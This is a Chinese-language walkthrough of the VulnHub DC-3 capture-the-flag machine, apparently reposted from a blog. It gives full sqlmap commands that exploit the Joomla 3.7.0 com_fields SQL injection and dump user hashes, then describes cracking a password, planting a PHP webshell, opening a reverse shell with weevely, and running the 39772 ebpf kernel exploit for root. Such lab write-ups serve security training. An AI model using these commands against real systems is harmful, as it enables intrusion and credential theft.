下载地址
https://www.vulnhub.com/entry/dc-3,312/
实战步骤
首先我们打开靶机
用nmap探测主机
应该是152,探测一下端口
只开了个80,访问看看
是一个joomla的cms,我们需要确定cms的版本,然后看看有没有能利用的漏洞。我们用如下命令:
joomscan --url http://192.168.220.136
确定版本,joomla3.7.0,用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞
searchsploit Joomla 3.7.0
cp /usr/share/exploitdb/exploits/PHP/webapps/42033.txt sql.txt
cat sql.txt
使用注入方法:
看一下我们现在用的joomladb
sqlmap -u "http://192.168.207.152/index.PHP?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
再看一下users那个表
sqlmap -u "http://192.168.207.152/index.PHP?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
值得注意的是name和password
sqlmap -u "http://192.168.207.152/index.PHP?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
vim 111
使用john爆破hash值
得到密码snoopy
我们需要进入后台,查找得知administrator是joomla默认的后台地址,我们尝试访问
进来了,哈哈,用刚才获取的账户密码登陆
这里有个New File,尝试搞个一句话
用蚁剑连接
成功连上
接下来用weevely反弹个shell出来
用kali连接
拿到shell,可很明显我们要的东西应该在root文件夹下,要进行提权处理,搜索本机信息查看内核版本
ubantu 16.04,去看看有什么提取方法。使用searchsploit
这个可以用来提权,尝试使用
去下载,解压之后上传到目标主机(需要翻墙)
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
进入到tmp文件夹依次执行
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
等待一会,提权成功,游戏结束
总结
看一下整体思路:
1、确定cms版本
2、针对版本找目录
4、用weevely反弹个shell出来
5、确定内核版本,找对应漏洞
6、提权,over
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。